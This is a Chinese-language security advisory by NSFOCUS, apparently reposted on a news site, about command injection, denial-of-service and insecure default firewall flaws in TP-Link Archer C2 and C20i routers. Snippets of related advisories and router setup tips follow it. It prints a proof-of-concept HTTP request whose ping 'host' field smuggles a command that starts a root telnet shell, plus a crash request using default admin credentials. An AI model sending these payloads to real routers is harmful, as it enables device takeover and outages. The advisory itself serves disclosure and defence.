TP-Link C2和C20i产品出现命令注入、DoS等多个漏洞 绿盟科技发布安全威胁通告

TP-LINK Archer C2 和 TP-LINK Archer C20i都是该公司的路由器产品,近期这两款产品爆出多个严重漏洞,绿盟科技就此情况发布《TP-Link C2和C20i命令注入、拒绝服务等漏洞安全威胁通告》,通告全文如下:

日前,pierrekim.github.io网站发布了一个安全通告,公布了固件版本为“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”的TP-Link C2和C20i产品的多个漏洞。漏洞包括命令注入(需要身份认证)、拒绝服务以及不安全的默认配置。

命令注入漏洞

一个经过身份认证的攻击者,可以仅仅通过发送一个HTTP请求来进行命令注入,成功利用该漏洞,攻击者可以以root权限执行命令。该漏洞的一个POC如下:

POST /cgi?2 HTTP/1.1

Host: 192.168.1.1

Content-Type: text/plain

Referer: http://192.168.1.1/mainFrame.htm

Content-Length: 208

Cookie: Authorization=Basic YWRtaW46YWRtaW4=

Connection: close

[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6

dataBlockSize=64

timeout=1

numberOfRepetitions=1

host=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)

X_TP_ConnName=ewan_ipoe_d

diagnosticsState=Requested

当攻击者向具有漏洞设备的“Diagnostic”页面发送上述请求时,就可以得到一个远程shell:以root身份启动telnetd程序。

拒绝服务漏洞

一个经过身份认证的攻击者,可以通过向目标发送如下请求来导致设备崩溃:

GET /cgi/ansi HTTP/1.1

Host: 192.168.1.1

Content-Type: text/plain

Referer: http://192.168.1.1/mainFrame.htm

Content-Length: 208

Cookie: Authorization=Basic YWRtaW46YWRtaW4=

Connection: close

不安全的默认配置

另外,这两款产品还存在不安全的IP Tables默认配置。该默认规则由/lib/libcmm.so产生,并将相关规则写入文件/var/tmp/dconf/rc.router。其中一条规则如下:

iptables -A INPUT -p udp --dport 161 -j ACCEPT

该规则导致SNMP协议端口在每个网卡接口上都开放。

然而幸运的是,虽然SNMP的相关配置可以通过/main/snmp.html页面进行修改,但是snmpd程序已经从固件镜像中删除了。

相关链接如下:https://pierrekim.github.io/advisories/2017-tplink-0x00.txt

受影响的版本

使用“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”版本固件的TP-Link C2和C20i。

规避方案

TP-Link厂商表示将会在今年发布补丁,以修补上述漏洞。作为临时的缓解策略,用户可以禁用WAN口的管理功能。

绿盟科技声明

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。

原文发布时间:2017年3月24日 

本文由:绿盟科技发布,版权归属于原作者

原文链接:http://toutiao.secjia.com/tp-link-c2-and-c20i-vulnerability

时间: 2024-08-31 23:20:34

TP-Link C2和C20i产品出现命令注入、DoS等多个漏洞 绿盟科技发布安全威胁通告的相关文章

Roundcube远程命令执行漏洞 绿盟科技发布安全威胁通告

2016年12月6日(当地时间),blog.ripstech.com网站发布了一条关于Roundcube远程命令执行漏洞的消息.在Roundcube1.2.2及其以前的版本中,deliver_message()函数在调用PHP内建函数mail()时的第5个参数可由用户控制且未经恰当过滤,mail()函数被调用后会使得PHP执行sendmail程序,而未经过滤的第5个参数允许对sendmail程序进行配置,从而使得sendmail程序将邮件流量保存在文件中,攻击者可以利用这个机制通过发送邮件将恶意

Ubiquiti几十款无线产品爆出命令注入漏洞 是因为没有升级老版本的PHP 据说厂商还未给出补丁

Ubiquiti Networks公司提供的几十款产品中存在紧急漏洞,该漏洞可用于劫持设备.这个漏洞已于11月上报给了该厂商,但目前厂商尚未发布补丁修复大多数受影响的设备. 命令注入漏洞来自于没有升级到老版本PHP 该漏洞由SEC Consult公司的研究员发现,称其为Ubiquiti设备的管理界面的命令注入漏洞.该漏洞影响pingtest_action.cgi组件,部分原因是由于使用了旧版本的PHP,即1997年发布的PHP 2.0.1. 经过认证的攻击者可利用低权限的只读账户,或未经认证的远

tp link路由器地址是什么

  一般情况是出现在我们第一次设置路由器时会登录不了路由器界面了,tp link路由器地址默认是192.168.1.1哦,下面我来给大家介绍登录不了管理界面解决办法与原因分析. 1.确认登录管理界面的方法和输入正确. 如下图所示,打开浏览器,在地址栏中输入192.168.1.1(注意中间的"."不能输入为"."),并按回车.如果仍然不能打开,请进行下一步排查. 2.检查并确认设备连线正确. 如下图所示,电脑网线连接路由器LAN1-4中其中之一,路由器电源通电,查看并

TP Link无线路由器设置

对初次接触无线网络的朋友来说,无线路由器怎么设置 可是困扰他们的一大难题.如何简单轻松地进行路由器的设置呢?下面我们将以颇具代表性的TP Link无线路由器 为例,为大家讲解如何快速地组建无线网络,来获得更好的无线传输效果.那么,就来一起了解下TP Link无线路由器设置 的方法吧. [TP Link无线路由器设置]登陆 对于TP Link无线路由器设置,先将电源接好,然后用网线将无线路由器的LAN口和计算机的网口连接好,这时就可以对无线路由器进行配置了. 你会在TP Link无线路由器的底部铭

教你进行tp link路由器升级

tp link路由器升级步骤如下描述:当我们使用路由器设备进行组网时,一旦遇到类似路由器设备死机.网络频繁掉线现象时,我们可以考虑路由器升级,以便及时修正路由器系统自身的BUG,确保路由器工作效率更加高效!一般来说,路由器升级其实就是对路由器的固件进行刷新,让其固件版本升级到最新状态.现在,本文就以TP-Link品牌型号为TL-WR541G+的无线路由器为操作蓝本,向各位朋友详细介绍一下tp link路由器升级的具体操作过程.1.首先我们应该登录到对应品牌产品的官方网站中,寻找并下载对应型号的路

TP link配置WPA加密

目前来说WPA加密无线网络是最为安全的,还没有出现任何破解办法,所以本文介绍如何在tp link 802.11n套装中配置WPA加密方式来提升无线网络安全. 小提示:在我们的tp link 802.11n套装中无线路由器提供了一种名为WPA/WPA2的加密方式,不过这种方式的加密是需要RADIUS服务器的,通过RADIUS服务器达到验证的目的,对于我们大多数家庭来说不太现实,所以我们不对此做过多介绍. 第一步:进入无线路由设备管理界面.然后选择"无线设置"下的"无线安全设置&

tp link怎么设置端口映射

  tp link设置端口映射的方法 设置方法一: 1.添加新条目,登录路由器管理界面,进入 转发规则 > 虚拟服务器,并点击 添加新条目. 2.添加映射规则.添加服务器映射到外网的端口.实际端口.以及服务器IP地址. 注意:服务端口可以根据实际需要修改,内部端口必须与服务器端口一致. 3.添加完成后列表如下:至此,虚拟服务器(端口映射)规则设置完成. 设置方法二: 1.下载并登陆花生壳动态域名解析软件; 2.点击内网映射打开web端设置页面; 3.点击添加映射,填写映射信息; 4.点击确定,即

tp link wdr6300路由器怎么设置

  tp link wdr6300路由器设置方法 登录到TL-WDR6300路由器的设置界面,然后点击"无线频段设置"-->选择"无线同时工作在2.4GHz和5GHz频段(802.11a/b/g/n/ac)上"-->"保存". TP-Link TL-WDR6300路由器设置无线名称和密码教程步骤二:2.4GHZ无线网络名称和密码设置 1.2.4GHZ无线网络名称设置:点击"无线设置2.4GHz"-->&quo

tp link光纤无线路由器怎么设置

  tp link光纤无线路由器设置方法 1.首先打开电脑,然后任意打开一个网页,然后在浏览器的网址除输入自己路由器的登录iP地址,如下图: 如上图,以笔者无线路由器为例,首先在浏览器地址栏输入192.168.1.1然后按回车键,即可弹出下面的用户登录对话框,我们输路由器默认的用户名与密码,然后点击底部的"确定"即可进入到无线路由器内置设置界面. 2.进入路由器设置界面后,我们首先点击左侧导航里边的"设置向导"如下图: 进入路由器设置向导 3.点击"设置向